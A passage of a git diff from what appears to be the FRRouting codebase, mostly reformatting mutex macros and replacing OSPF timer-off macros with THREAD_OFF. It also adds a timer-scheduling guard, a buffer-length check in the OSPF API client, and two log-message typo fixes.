@@ -64,7 +64,7 @@ void frr_pthread_finish(void)
{
frr_pthread_stop_all();
- frr_with_mutex(&frr_pthread_list_mtx) {
+ frr_with_mutex (&frr_pthread_list_mtx) {
struct listnode *n, *nn;
struct frr_pthread *fpt;
@@ -105,7 +105,7 @@ struct frr_pthread *frr_pthread_new(const struct frr_pthread_attr *attr,
pthread_mutex_init(fpt->running_cond_mtx, NULL);
pthread_cond_init(fpt->running_cond, NULL);
- frr_with_mutex(&frr_pthread_list_mtx) {
+ frr_with_mutex (&frr_pthread_list_mtx) {
listnode_add(frr_pthread_list, fpt);
}
@@ -126,7 +126,7 @@ static void frr_pthread_destroy_nolock(struct frr_pthread *fpt)
void frr_pthread_destroy(struct frr_pthread *fpt)
{
- frr_with_mutex(&frr_pthread_list_mtx) {
+ frr_with_mutex (&frr_pthread_list_mtx) {
listnode_delete(frr_pthread_list, fpt);
}
@@ -193,7 +193,7 @@ int frr_pthread_run(struct frr_pthread *fpt, const pthread_attr_t *attr)
void frr_pthread_wait_running(struct frr_pthread *fpt)
{
- frr_with_mutex(fpt->running_cond_mtx) {
+ frr_with_mutex (fpt->running_cond_mtx) {
while (!fpt->running)
pthread_cond_wait(fpt->running_cond,
fpt->running_cond_mtx);
@@ -202,7 +202,7 @@ void frr_pthread_wait_running(struct frr_pthread *fpt)
void frr_pthread_notify_running(struct frr_pthread *fpt)
{
- frr_with_mutex(fpt->running_cond_mtx) {
+ frr_with_mutex (fpt->running_cond_mtx) {
fpt->running = true;
pthread_cond_signal(fpt->running_cond);
}
@@ -219,7 +219,7 @@ int frr_pthread_stop(struct frr_pthread *fpt, void **result)
void frr_pthread_stop_all(void)
{
- frr_with_mutex(&frr_pthread_list_mtx) {
+ frr_with_mutex (&frr_pthread_list_mtx) {
struct listnode *n;
struct frr_pthread *fpt;
for (ALL_LIST_ELEMENTS_RO(frr_pthread_list, n, fpt)) {
diff --git a/lib/hash.c b/lib/hash.c
index e9132f7907..4b371b43ab 100644
--- a/lib/hash.c
+++ b/lib/hash.c
@@ -56,7 +56,7 @@ struct hash *hash_create_size(unsigned int size,
hash->name = name ? XSTRDUP(MTYPE_HASH, name) : NULL;
hash->stats.empty = hash->size;
- frr_with_mutex(&_hashes_mtx) {
+ frr_with_mutex (&_hashes_mtx) {
if (!_hashes)
_hashes = list_new();
@@ -329,7 +329,7 @@ struct list *hash_to_list(struct hash *hash)
void hash_free(struct hash *hash)
{
- frr_with_mutex(&_hashes_mtx) {
+ frr_with_mutex (&_hashes_mtx) {
if (_hashes) {
listnode_delete(_hashes, hash);
if (_hashes->count == 0) {
diff --git a/lib/log_filter.c b/lib/log_filter.c
index f01497dead..df74a8c9ba 100644
--- a/lib/log_filter.c
+++ b/lib/log_filter.c
@@ -43,14 +43,14 @@ static int zlog_filter_lookup(const char *lookup)
void zlog_filter_clear(void)
{
- frr_with_mutex(&logfilterlock) {
+ frr_with_mutex (&logfilterlock) {
zlog_filter_count = 0;
}
}
int zlog_filter_add(const char *filter)
{
- frr_with_mutex(&logfilterlock) {
+ frr_with_mutex (&logfilterlock) {
if (zlog_filter_count >= ZLOG_FILTERS_MAX)
return 1;
@@ -74,7 +74,7 @@ int zlog_filter_add(const char *filter)
int zlog_filter_del(const char *filter)
{
- frr_with_mutex(&logfilterlock) {
+ frr_with_mutex (&logfilterlock) {
int found_idx = zlog_filter_lookup(filter);
int last_idx = zlog_filter_count - 1;
@@ -96,7 +96,7 @@ int zlog_filter_dump(char *buf, size_t max_size)
{
int len = 0;
- frr_with_mutex(&logfilterlock) {
+ frr_with_mutex (&logfilterlock) {
for (int i = 0; i < zlog_filter_count; i++) {
int ret;
@@ -115,7 +115,7 @@ static int search_buf(const char *buf, size_t len)
{
char *found = NULL;
- frr_with_mutex(&logfilterlock) {
+ frr_with_mutex (&logfilterlock) {
for (int i = 0; i < zlog_filter_count; i++) {
found = memmem(buf, len, zlog_filters[i],
strlen(zlog_filters[i]));
diff --git a/lib/northbound_grpc.cpp b/lib/northbound_grpc.cpp
index 9cb999110b..95721ffc77 100644
--- a/lib/northbound_grpc.cpp
+++ b/lib/northbound_grpc.cpp
@@ -198,7 +198,7 @@ class RpcStateBase
static void c_callback(struct thread *thread)
{
- auto _tag = static_cast<RpcStateBase *>(thread->arg);
+ auto _tag = static_cast<RpcStateBase *>(THREAD_ARG(thread));
/*
* We hold the lock until the callback finishes and has updated
* _tag->state, then we signal done and release.
diff --git a/lib/privs.c b/lib/privs.c
index 5cba90839f..71416beebe 100644
--- a/lib/privs.c
+++ b/lib/privs.c
@@ -488,7 +488,7 @@ struct zebra_privs_t *_zprivs_raise(struct zebra_privs_t *privs,
* Serialize 'raise' operations; particularly important for
* OSes where privs are process-wide.
*/
- frr_with_mutex(&(privs->mutex)) {
+ frr_with_mutex (&(privs->mutex)) {
/* Locate ref-counting object to use */
refs = get_privs_refs(privs);
@@ -517,7 +517,7 @@ void _zprivs_lower(struct zebra_privs_t **privs)
/* Serialize 'lower privs' operation - particularly important
* when OS privs are process-wide.
*/
- frr_with_mutex(&(*privs)->mutex) {
+ frr_with_mutex (&(*privs)->mutex) {
refs = get_privs_refs(*privs);
if (--(refs->refcount) == 0) {
diff --git a/lib/stream.c b/lib/stream.c
index 83ed015bc9..2de3abdf45 100644
--- a/lib/stream.c
+++ b/lib/stream.c
@@ -1280,7 +1280,7 @@ void stream_fifo_push(struct stream_fifo *fifo, struct stream *s)
void stream_fifo_push_safe(struct stream_fifo *fifo, struct stream *s)
{
- frr_with_mutex(&fifo->mtx) {
+ frr_with_mutex (&fifo->mtx) {
stream_fifo_push(fifo, s);
}
}
@@ -1312,7 +1312,7 @@ struct stream *stream_fifo_pop_safe(struct stream_fifo *fifo)
{
struct stream *ret;
- frr_with_mutex(&fifo->mtx) {
+ frr_with_mutex (&fifo->mtx) {
ret = stream_fifo_pop(fifo);
}
@@ -1328,7 +1328,7 @@ struct stream *stream_fifo_head_safe(struct stream_fifo *fifo)
{
struct stream *ret;
- frr_with_mutex(&fifo->mtx) {
+ frr_with_mutex (&fifo->mtx) {
ret = stream_fifo_head(fifo);
}
@@ -1350,7 +1350,7 @@ void stream_fifo_clean(struct stream_fifo *fifo)
void stream_fifo_clean_safe(struct stream_fifo *fifo)
{
- frr_with_mutex(&fifo->mtx) {
+ frr_with_mutex (&fifo->mtx) {
stream_fifo_clean(fifo);
}
}
diff --git a/lib/thread.c b/lib/thread.c
index fd79503cc6..c3613b5b0e 100644
--- a/lib/thread.c
+++ b/lib/thread.c
@@ -217,7 +217,7 @@ static void cpu_record_print(struct vty *vty, uint8_t filter)
tmp.funcname = "TOTAL";
tmp.types = filter;
- frr_with_mutex(&masters_mtx) {
+ frr_with_mutex (&masters_mtx) {
for (ALL_LIST_ELEMENTS_RO(masters, ln, m)) {
const char *name = m->name ? m->name : "main";
@@ -283,9 +283,9 @@ static void cpu_record_clear(uint8_t filter)
struct thread_master *m;
struct listnode *ln;
- frr_with_mutex(&masters_mtx) {
+ frr_with_mutex (&masters_mtx) {
for (ALL_LIST_ELEMENTS_RO(masters, ln, m)) {
- frr_with_mutex(&m->mtx) {
+ frr_with_mutex (&m->mtx) {
void *args[2] = {tmp, m->cpu_record};
hash_iterate(
m->cpu_record,
@@ -463,7 +463,7 @@ DEFUN_NOSH (show_thread_poll,
struct listnode *node;
struct thread_master *m;
- frr_with_mutex(&masters_mtx) {
+ frr_with_mutex (&masters_mtx) {
for (ALL_LIST_ELEMENTS_RO(masters, node, m)) {
show_thread_poll_helper(vty, m);
}
@@ -630,7 +630,7 @@ struct thread_master *thread_master_create(const char *name)
sizeof(struct pollfd) * rv->handler.pfdsize);
/* add to list of threadmasters */
- frr_with_mutex(&masters_mtx) {
+ frr_with_mutex (&masters_mtx) {
if (!masters)
masters = list_new();
@@ -642,7 +642,7 @@ struct thread_master *thread_master_create(const char *name)
void thread_master_set_name(struct thread_master *master, const char *name)
{
- frr_with_mutex(&master->mtx) {
+ frr_with_mutex (&master->mtx) {
XFREE(MTYPE_THREAD_MASTER, master->name);
master->name = XSTRDUP(MTYPE_THREAD_MASTER, name);
}
@@ -708,7 +708,7 @@ static void thread_array_free(struct thread_master *m,
*/
void thread_master_free_unused(struct thread_master *m)
{
- frr_with_mutex(&m->mtx) {
+ frr_with_mutex (&m->mtx) {
struct thread *t;
while ((t = thread_list_pop(&m->unuse)))
thread_free(m, t);
@@ -720,7 +720,7 @@ void thread_master_free(struct thread_master *m)
{
struct thread *t;
- frr_with_mutex(&masters_mtx) {
+ frr_with_mutex (&masters_mtx) {
listnode_delete(masters, m);
if (masters->count == 0) {
list_delete(&masters);
@@ -756,7 +756,10 @@ unsigned long thread_timer_remain_msec(struct thread *thread)
{
int64_t remain;
- frr_with_mutex(&thread->mtx) {
+ if (!thread_is_scheduled(thread))
+ return 0;
+
+ frr_with_mutex (&thread->mtx) {
remain = monotime_until(&thread->u.sands, NULL) / 1000LL;
}
@@ -772,7 +775,7 @@ unsigned long thread_timer_remain_second(struct thread *thread)
struct timeval thread_timer_remain(struct thread *thread)
{
struct timeval remain;
- frr_with_mutex(&thread->mtx) {
+ frr_with_mutex (&thread->mtx) {
monotime_until(&thread->u.sands, &remain);
}
return remain;
@@ -987,7 +990,7 @@ void _thread_add_read_write(const struct xref_threadsched *xref,
if (fd >= m->fd_limit)
assert(!"Number of FD's open is greater than FRR currently configured to handle, aborting");
- frr_with_mutex(&m->mtx) {
+ frr_with_mutex (&m->mtx) {
if (t_ptr && *t_ptr)
// thread is already scheduled; don't reschedule
break;
@@ -1030,7 +1033,7 @@ void _thread_add_read_write(const struct xref_threadsched *xref,
m->handler.pfdcount++;
if (thread) {
- frr_with_mutex(&thread->mtx) {
+ frr_with_mutex (&thread->mtx) {
thread->u.fd = fd;
thread_array[thread->u.fd] = thread;
}
@@ -1066,14 +1069,14 @@ static void _thread_add_timer_timeval(const struct xref_threadsched *xref,
monotime(&t);
timeradd(&t, time_relative, &t);
- frr_with_mutex(&m->mtx) {
+ frr_with_mutex (&m->mtx) {
if (t_ptr && *t_ptr)
/* thread is already scheduled; don't reschedule */
return;
thread = thread_get(m, THREAD_TIMER, func, arg, xref);
- frr_with_mutex(&thread->mtx) {
+ frr_with_mutex (&thread->mtx) {
thread->u.sands = t;
thread_timer_list_add(&m->timer, thread);
if (t_ptr) {
@@ -1151,13 +1154,13 @@ void _thread_add_event(const struct xref_threadsched *xref,
assert(m != NULL);
- frr_with_mutex(&m->mtx) {
+ frr_with_mutex (&m->mtx) {
if (t_ptr && *t_ptr)
/* thread is already scheduled; don't reschedule */
break;
thread = thread_get(m, THREAD_EVENT, func, arg, xref);
- frr_with_mutex(&thread->mtx) {
+ frr_with_mutex (&thread->mtx) {
thread->u.val = val;
thread_list_add_tail(&m->event, thread);
}
@@ -1438,7 +1441,7 @@ static void cancel_event_helper(struct thread_master *m, void *arg, int flags)
cr->flags = flags;
- frr_with_mutex(&m->mtx) {
+ frr_with_mutex (&m->mtx) {
cr->eventobj = arg;
listnode_add(m->cancel_req, cr);
do_thread_cancel(m);
@@ -1496,7 +1499,7 @@ void thread_cancel(struct thread **thread)
assert(master->owner == pthread_self());
- frr_with_mutex(&master->mtx) {
+ frr_with_mutex (&master->mtx) {
struct cancel_req *cr =
XCALLOC(MTYPE_TMP, sizeof(struct cancel_req));
cr->thread = *thread;
@@ -1548,7 +1551,7 @@ void thread_cancel_async(struct thread_master *master, struct thread **thread,
assert(master->owner != pthread_self());
- frr_with_mutex(&master->mtx) {
+ frr_with_mutex (&master->mtx) {
master->canceled = false;
if (thread) {
@@ -1928,7 +1931,7 @@ unsigned long thread_consumed_time(RUSAGE_T *now, RUSAGE_T *start,
int thread_should_yield(struct thread *thread)
{
int result;
- frr_with_mutex(&thread->mtx) {
+ frr_with_mutex (&thread->mtx) {
result = monotime_since(&thread->real, NULL)
> (int64_t)thread->yield;
}
@@ -1937,7 +1940,7 @@ int thread_should_yield(struct thread *thread)
void thread_set_yield_time(struct thread *thread, unsigned long yield_time)
{
- frr_with_mutex(&thread->mtx) {
+ frr_with_mutex (&thread->mtx) {
thread->yield = yield_time;
}
}
@@ -2079,11 +2082,11 @@ void _thread_execute(const struct xref_threadsched *xref,
struct thread *thread;
/* Get or allocate new thread to execute. */
- frr_with_mutex(&m->mtx) {
+ frr_with_mutex (&m->mtx) {
thread = thread_get(m, THREAD_EVENT, func, arg, xref);
/* Set its event value. */
- frr_with_mutex(&thread->mtx) {
+ frr_with_mutex (&thread->mtx) {
thread->add_type = THREAD_EXECUTE;
thread->u.val = val;
thread->ref = &thread;
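The thread_is_scheduled() guard added to thread_timer_remain_msec() above is what lets callers stop checking the timer pointer themselves, as the ldpd hunks earlier in this patch do. A minimal caller-side sketch (names follow ldpd/neighbor.c; the surrounding struct is elided):

    /* Before: the caller guarded against an unscheduled timer. */
    if (nbr->keepalive_timer)
        nctl.hold_time_remaining =
            thread_timer_remain_second(nbr->keepalive_timer);
    else
        nctl.hold_time_remaining = 0;

    /* After: the library returns 0 for an unscheduled (NULL) timer,
     * so the call can be made unconditionally. */
    nctl.hold_time_remaining =
        thread_timer_remain_second(nbr->keepalive_timer);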
diff --git a/lib/zlog_targets.c b/lib/zlog_targets.c
index 48785ad298..31bd8e16eb 100644
--- a/lib/zlog_targets.c
+++ b/lib/zlog_targets.c
@@ -242,14 +242,14 @@ static bool zlog_file_cycle(struct zlog_cfg_file *zcf)
void zlog_file_set_other(struct zlog_cfg_file *zcf)
{
- frr_with_mutex(&zcf->cfg_mtx) {
+ frr_with_mutex (&zcf->cfg_mtx) {
zlog_file_cycle(zcf);
}
}
bool zlog_file_set_filename(struct zlog_cfg_file *zcf, const char *filename)
{
- frr_with_mutex(&zcf->cfg_mtx) {
+ frr_with_mutex (&zcf->cfg_mtx) {
XFREE(MTYPE_LOG_FD_NAME, zcf->filename);
zcf->filename = XSTRDUP(MTYPE_LOG_FD_NAME, filename);
zcf->fd = -1;
@@ -261,7 +261,7 @@ bool zlog_file_set_filename(struct zlog_cfg_file *zcf, const char *filename)
bool zlog_file_set_fd(struct zlog_cfg_file *zcf, int fd)
{
- frr_with_mutex(&zcf->cfg_mtx) {
+ frr_with_mutex (&zcf->cfg_mtx) {
if (zcf->fd == fd)
return true;
@@ -283,7 +283,7 @@ bool zlog_file_rotate(struct zlog_cfg_file *zcf)
struct rcu_close_rotate *rcr;
int fd;
- frr_with_mutex(&zcf->cfg_mtx) {
+ frr_with_mutex (&zcf->cfg_mtx) {
if (!zcf->active || !zcf->filename)
return true;
@@ -517,7 +517,7 @@ void zlog_syslog_set_facility(int facility)
struct zlog_target *newztc;
struct zlt_syslog *newzt;
- frr_with_mutex(&syslog_cfg_mutex) {
+ frr_with_mutex (&syslog_cfg_mutex) {
if (facility == syslog_facility)
return;
syslog_facility = facility;
@@ -540,7 +540,7 @@ void zlog_syslog_set_facility(int facility)
int zlog_syslog_get_facility(void)
{
- frr_with_mutex(&syslog_cfg_mutex) {
+ frr_with_mutex (&syslog_cfg_mutex) {
return syslog_facility;
}
assert(0);
@@ -551,7 +551,7 @@ void zlog_syslog_set_prio_min(int prio_min)
struct zlog_target *newztc;
struct zlt_syslog *newzt = NULL;
- frr_with_mutex(&syslog_cfg_mutex) {
+ frr_with_mutex (&syslog_cfg_mutex) {
if (prio_min == syslog_prio_min)
return;
syslog_prio_min = prio_min;
@@ -577,7 +577,7 @@ void zlog_syslog_set_prio_min(int prio_min)
int zlog_syslog_get_prio_min(void)
{
- frr_with_mutex(&syslog_cfg_mutex) {
+ frr_with_mutex (&syslog_cfg_mutex) {
return syslog_prio_min;
}
assert(0);
diff --git a/ospf6d/ospf6_gr_helper.c b/ospf6d/ospf6_gr_helper.c
index 33a7a57c0f..f8b37d803f 100644
--- a/ospf6d/ospf6_gr_helper.c
+++ b/ospf6d/ospf6_gr_helper.c
@@ -340,7 +340,7 @@ int ospf6_process_grace_lsa(struct ospf6 *ospf6, struct ospf6_lsa *lsa,
&& !OSPF6_GR_IS_PLANNED_RESTART(restart_reason)) {
if (IS_DEBUG_OSPF6_GR)
zlog_debug(
- "%s, Router supports only planned restarts but received the GRACE LSA due a unplanned restart",
+ "%s, Router supports only planned restarts but received the GRACE LSA due to an unplanned restart",
__func__);
restarter->gr_helper_info.rejected_reason =
OSPF6_HELPER_PLANNED_ONLY_RESTART;
diff --git a/ospfclient/ospf_apiclient.c b/ospfclient/ospf_apiclient.c
index e84c6f5b3c..b5e6389d4c 100644
--- a/ospfclient/ospf_apiclient.c
+++ b/ospfclient/ospf_apiclient.c
@@ -439,6 +439,12 @@ int ospf_apiclient_lsa_originate(struct ospf_apiclient *oclient,
struct lsa_header *lsah;
uint32_t tmp;
+ /* Validate opaque LSA length */
+ if ((size_t)opaquelen > sizeof(buf) - sizeof(struct lsa_header)) {
+ fprintf(stderr, "opaquelen(%d) is larger than buf size %zu\n",
+ opaquelen, sizeof(buf));
+ return OSPF_API_NOMEMORY;
+ }
/* We can only originate opaque LSAs */
if (!IS_OPAQUE_LSA(lsa_type)) {
diff --git a/ospfd/ospf_apiserver.c b/ospfd/ospf_apiserver.c
index 9d73c3dfe6..b8567830b1 100644
--- a/ospfd/ospf_apiserver.c
+++ b/ospfd/ospf_apiserver.c
@@ -318,12 +318,12 @@ void ospf_apiserver_free(struct ospf_apiserver *apiserv)
struct listnode *node;
/* Cancel read and write threads. */
- thread_cancel(&apiserv->t_sync_read);
+ THREAD_OFF(apiserv->t_sync_read);
#ifdef USE_ASYNC_READ
- thread_cancel(&apiserv->t_async_read);
+ THREAD_OFF(apiserv->t_async_read);
#endif /* USE_ASYNC_READ */
- thread_cancel(&apiserv->t_sync_write);
- thread_cancel(&apiserv->t_async_write);
+ THREAD_OFF(apiserv->t_sync_write);
+ THREAD_OFF(apiserv->t_async_write);
/* Unregister all opaque types that application registered
and flush opaque LSAs if still in LSDB. */
diff --git a/ospfd/ospf_gr.c b/ospfd/ospf_gr.c
index 2521f2fce0..66ef1d6564 100644
--- a/ospfd/ospf_gr.c
+++ b/ospfd/ospf_gr.c
@@ -216,7 +216,7 @@ static void ospf_gr_restart_exit(struct ospf *ospf, const char *reason)
zlog_debug("GR: exiting graceful restart: %s", reason);
ospf->gr_info.restart_in_progress = false;
- OSPF_TIMER_OFF(ospf->gr_info.t_grace_period);
+ THREAD_OFF(ospf->gr_info.t_grace_period);
/* Record in non-volatile memory that the restart is complete. */
ospf_gr_nvm_delete(ospf);
diff --git a/ospfd/ospf_interface.c b/ospfd/ospf_interface.c
index 5df2ecf070..633ab05131 100644
--- a/ospfd/ospf_interface.c
+++ b/ospfd/ospf_interface.c
@@ -302,7 +302,7 @@ void ospf_if_cleanup(struct ospf_interface *oi)
/* oi->nbrs and oi->nbr_nbma should be deleted on InterfaceDown event */
/* delete all static neighbors attached to this interface */
for (ALL_LIST_ELEMENTS(oi->nbr_nbma, node, nnode, nbr_nbma)) {
- OSPF_POLL_TIMER_OFF(nbr_nbma->t_poll);
+ THREAD_OFF(nbr_nbma->t_poll);
if (nbr_nbma->nbr) {
nbr_nbma->nbr->nbr_nbma = NULL;
@@ -513,7 +513,7 @@ void ospf_if_stream_unset(struct ospf_interface *oi)
if (oi->on_write_q) {
listnode_delete(ospf->oi_write_q, oi);
if (list_isempty(ospf->oi_write_q))
- OSPF_TIMER_OFF(ospf->t_write);
+ THREAD_OFF(ospf->t_write);
oi->on_write_q = 0;
}
}
@@ -1474,7 +1474,7 @@ void ospf_reset_hello_timer(struct interface *ifp, struct in_addr addr,
ospf_hello_send(oi);
/* Restart hello timer for this interface */
- OSPF_ISM_TIMER_OFF(oi->t_hello);
+ THREAD_OFF(oi->t_hello);
OSPF_HELLO_TIMER_ON(oi);
}
@@ -1498,7 +1498,7 @@ void ospf_reset_hello_timer(struct interface *ifp, struct in_addr addr,
ospf_hello_send(oi);
/* Restart the hello timer. */
- OSPF_ISM_TIMER_OFF(oi->t_hello);
+ THREAD_OFF(oi->t_hello);
OSPF_HELLO_TIMER_ON(oi);
}
}
diff --git a/ospfd/ospf_ism.c b/ospfd/ospf_ism.c
index 97da61034f..ab75ab9a1a 100644
--- a/ospfd/ospf_ism.c
+++ b/ospfd/ospf_ism.c
@@ -290,16 +290,16 @@ static void ism_timer_set(struct ospf_interface *oi)
interface parameters must be set to initial values, and
timers are
reset also. */
- OSPF_ISM_TIMER_OFF(oi->t_hello);
- OSPF_ISM_TIMER_OFF(oi->t_wait);
- OSPF_ISM_TIMER_OFF(oi->t_ls_ack);
+ THREAD_OFF(oi->t_hello);
+ THREAD_OFF(oi->t_wait);
+ THREAD_OFF(oi->t_ls_ack);
break;
case ISM_Loopback:
/* In this state, the interface may be looped back and will be
unavailable for regular data traffic. */
- OSPF_ISM_TIMER_OFF(oi->t_hello);
- OSPF_ISM_TIMER_OFF(oi->t_wait);
- OSPF_ISM_TIMER_OFF(oi->t_ls_ack);
+ THREAD_OFF(oi->t_hello);
+ THREAD_OFF(oi->t_wait);
+ THREAD_OFF(oi->t_ls_ack);
break;
case ISM_Waiting:
/* The router is trying to determine the identity of DRouter and
@@ -309,7 +309,7 @@ static void ism_timer_set(struct ospf_interface *oi)
OSPF_ISM_TIMER_MSEC_ON(oi->t_hello, ospf_hello_timer, 1);
OSPF_ISM_TIMER_ON(oi->t_wait, ospf_wait_timer,
OSPF_IF_PARAM(oi, v_wait));
- OSPF_ISM_TIMER_OFF(oi->t_ls_ack);
+ THREAD_OFF(oi->t_ls_ack);
break;
case ISM_PointToPoint:
/* The interface connects to a physical Point-to-point network
@@ -318,7 +318,7 @@ static void ism_timer_set(struct ospf_interface *oi)
neighboring router. Hello packets are also sent. */
/* send first hello immediately */
OSPF_ISM_TIMER_MSEC_ON(oi->t_hello, ospf_hello_timer, 1);
- OSPF_ISM_TIMER_OFF(oi->t_wait);
+ THREAD_OFF(oi->t_wait);
OSPF_ISM_TIMER_ON(oi->t_ls_ack, ospf_ls_ack_timer,
oi->v_ls_ack);
break;
@@ -328,7 +328,7 @@ static void ism_timer_set(struct ospf_interface *oi)
and the router itself is neither Designated Router nor
Backup Designated Router. */
OSPF_HELLO_TIMER_ON(oi);
- OSPF_ISM_TIMER_OFF(oi->t_wait);
+ THREAD_OFF(oi->t_wait);
OSPF_ISM_TIMER_ON(oi->t_ls_ack, ospf_ls_ack_timer,
oi->v_ls_ack);
break;
@@ -337,7 +337,7 @@ static void ism_timer_set(struct ospf_interface *oi)
network,
and the router is Backup Designated Router. */
OSPF_HELLO_TIMER_ON(oi);
- OSPF_ISM_TIMER_OFF(oi->t_wait);
+ THREAD_OFF(oi->t_wait);
OSPF_ISM_TIMER_ON(oi->t_ls_ack, ospf_ls_ack_timer,
oi->v_ls_ack);
break;
@@ -346,7 +346,7 @@ static void ism_timer_set(struct ospf_interface *oi)
network,
and the router is Designated Router. */
OSPF_HELLO_TIMER_ON(oi);
- OSPF_ISM_TIMER_OFF(oi->t_wait);
+ THREAD_OFF(oi->t_wait);
OSPF_ISM_TIMER_ON(oi->t_ls_ack, ospf_ls_ack_timer,
oi->v_ls_ack);
break;
diff --git a/ospfd/ospf_ism.h b/ospfd/ospf_ism.h
index 35fbd15d00..92329bc55e 100644
--- a/ospfd/ospf_ism.h
+++ b/ospfd/ospf_ism.h
@@ -78,9 +78,6 @@
OSPF_IF_PARAM((O), v_hello)); \
} while (0)
-/* Macro for OSPF ISM timer turn off. */
-#define OSPF_ISM_TIMER_OFF(X) thread_cancel(&(X))
-
/* Macro for OSPF schedule event. */
#define OSPF_ISM_EVENT_SCHEDULE(I, E) \
thread_add_event(master, ospf_ism_event, (I), (E), NULL)
diff --git a/ospfd/ospf_lsa.c b/ospfd/ospf_lsa.c
index 2be81042a6..af05f5b59e 100644
--- a/ospfd/ospf_lsa.c
+++ b/ospfd/ospf_lsa.c
@@ -1761,7 +1761,7 @@ static struct ospf_lsa *ospf_handle_exnl_lsa_lsId_chg(struct ospf *ospf,
struct as_external_lsa *al;
struct in_addr mask;
struct ospf_lsa *new;
- struct external_info ei_summary;
+ struct external_info ei_summary = {};
struct external_info *ei_old;
lsa = ospf_lsdb_lookup_by_id(ospf->lsdb, OSPF_AS_EXTERNAL_LSA,
@@ -3625,7 +3625,7 @@ void ospf_flush_self_originated_lsas_now(struct ospf *ospf)
* without conflicting to other threads.
*/
if (ospf->t_maxage != NULL) {
- OSPF_TIMER_OFF(ospf->t_maxage);
+ THREAD_OFF(ospf->t_maxage);
thread_execute(master, ospf_maxage_lsa_remover, ospf, 0);
}
@@ -3935,9 +3935,9 @@ void ospf_refresher_register_lsa(struct ospf *ospf, struct ospf_lsa *lsa)
if (IS_DEBUG_OSPF(lsa, LSA_REFRESH))
zlog_debug(
- "LSA[Refresh:Type%d:%pI4]: ospf_refresher_register_lsa(): setting refresh_list on lsa %p (slod %d)",
- lsa->data->type, &lsa->data->id,
- (void *)lsa, index);
+ "LSA[Refresh:Type%d:%pI4]: ospf_refresher_register_lsa(): setting refresh_list on lsa %p (slot %d)",
+ lsa->data->type, &lsa->data->id, (void *)lsa,
+ index);
}
}
diff --git a/ospfd/ospf_neighbor.c b/ospfd/ospf_neighbor.c
index c59734b9f3..02c44dcdc1 100644
--- a/ospfd/ospf_neighbor.c
+++ b/ospfd/ospf_neighbor.c
@@ -140,17 +140,17 @@ void ospf_nbr_free(struct ospf_neighbor *nbr)
}
/* Cancel all timers. */
- OSPF_NSM_TIMER_OFF(nbr->t_inactivity);
- OSPF_NSM_TIMER_OFF(nbr->t_db_desc);
- OSPF_NSM_TIMER_OFF(nbr->t_ls_req);
- OSPF_NSM_TIMER_OFF(nbr->t_ls_upd);
+ THREAD_OFF(nbr->t_inactivity);
+ THREAD_OFF(nbr->t_db_desc);
+ THREAD_OFF(nbr->t_ls_req);
+ THREAD_OFF(nbr->t_ls_upd);
/* Cancel all events. */ /* Thread lookup cost would be negligible. */
thread_cancel_event(master, nbr);
bfd_sess_free(&nbr->bfd_session);
- OSPF_NSM_TIMER_OFF(nbr->gr_helper_info.t_grace_timer);
+ THREAD_OFF(nbr->gr_helper_info.t_grace_timer);
nbr->oi = NULL;
XFREE(MTYPE_OSPF_NEIGHBOR, nbr);
@@ -456,7 +456,7 @@ static struct ospf_neighbor *ospf_nbr_add(struct ospf_interface *oi,
nbr->nbr_nbma = nbr_nbma;
if (nbr_nbma->t_poll)
- OSPF_POLL_TIMER_OFF(nbr_nbma->t_poll);
+ THREAD_OFF(nbr_nbma->t_poll);
nbr->state_change = nbr_nbma->state_change + 1;
}
diff --git a/ospfd/ospf_nsm.c b/ospfd/ospf_nsm.c
index c538d1a09a..333389596b 100644
--- a/ospfd/ospf_nsm.c
+++ b/ospfd/ospf_nsm.c
@@ -120,32 +120,32 @@ static void nsm_timer_set(struct ospf_neighbor *nbr)
switch (nbr->state) {
case NSM_Deleted:
case NSM_Down:
- OSPF_NSM_TIMER_OFF(nbr->t_inactivity);
- OSPF_NSM_TIMER_OFF(nbr->t_hello_reply);
+ THREAD_OFF(nbr->t_inactivity);
+ THREAD_OFF(nbr->t_hello_reply);
/* fallthru */
case NSM_Attempt:
case NSM_Init:
case NSM_TwoWay:
- OSPF_NSM_TIMER_OFF(nbr->t_db_desc);
- OSPF_NSM_TIMER_OFF(nbr->t_ls_upd);
- OSPF_NSM_TIMER_OFF(nbr->t_ls_req);
+ THREAD_OFF(nbr->t_db_desc);
+ THREAD_OFF(nbr->t_ls_upd);
+ THREAD_OFF(nbr->t_ls_req);
break;
case NSM_ExStart:
OSPF_NSM_TIMER_ON(nbr->t_db_desc, ospf_db_desc_timer,
nbr->v_db_desc);
- OSPF_NSM_TIMER_OFF(nbr->t_ls_upd);
- OSPF_NSM_TIMER_OFF(nbr->t_ls_req);
+ THREAD_OFF(nbr->t_ls_upd);
+ THREAD_OFF(nbr->t_ls_req);
break;
case NSM_Exchange:
OSPF_NSM_TIMER_ON(nbr->t_ls_upd, ospf_ls_upd_timer,
nbr->v_ls_upd);
if (!IS_SET_DD_MS(nbr->dd_flags))
- OSPF_NSM_TIMER_OFF(nbr->t_db_desc);
+ THREAD_OFF(nbr->t_db_desc);
break;
case NSM_Loading:
case NSM_Full:
default:
- OSPF_NSM_TIMER_OFF(nbr->t_db_desc);
+ THREAD_OFF(nbr->t_db_desc);
break;
}
}
@@ -176,13 +176,13 @@ int nsm_should_adj(struct ospf_neighbor *nbr)
static int nsm_hello_received(struct ospf_neighbor *nbr)
{
/* Start or Restart Inactivity Timer. */
- OSPF_NSM_TIMER_OFF(nbr->t_inactivity);
+ THREAD_OFF(nbr->t_inactivity);
OSPF_NSM_TIMER_ON(nbr->t_inactivity, ospf_inactivity_timer,
nbr->v_inactivity);
if (nbr->oi->type == OSPF_IFTYPE_NBMA && nbr->nbr_nbma)
- OSPF_POLL_TIMER_OFF(nbr->nbr_nbma->t_poll);
+ THREAD_OFF(nbr->nbr_nbma->t_poll);
/* Send proactive ARP requests */
if (nbr->state < NSM_Exchange)
@@ -194,9 +194,9 @@ static int nsm_hello_received(struct ospf_neighbor *nbr)
static int nsm_start(struct ospf_neighbor *nbr)
{
if (nbr->nbr_nbma)
- OSPF_POLL_TIMER_OFF(nbr->nbr_nbma->t_poll);
+ THREAD_OFF(nbr->nbr_nbma->t_poll);
- OSPF_NSM_TIMER_OFF(nbr->t_inactivity);
+ THREAD_OFF(nbr->t_inactivity);
OSPF_NSM_TIMER_ON(nbr->t_inactivity, ospf_inactivity_timer,
nbr->v_inactivity);
diff --git a/ospfd/ospf_nsm.h b/ospfd/ospf_nsm.h
index 0b40b1f424..c526c4c3ed 100644
--- a/ospfd/ospf_nsm.h
+++ b/ospfd/ospf_nsm.h
@@ -58,9 +58,6 @@
/* Macro for OSPF NSM timer turn on. */
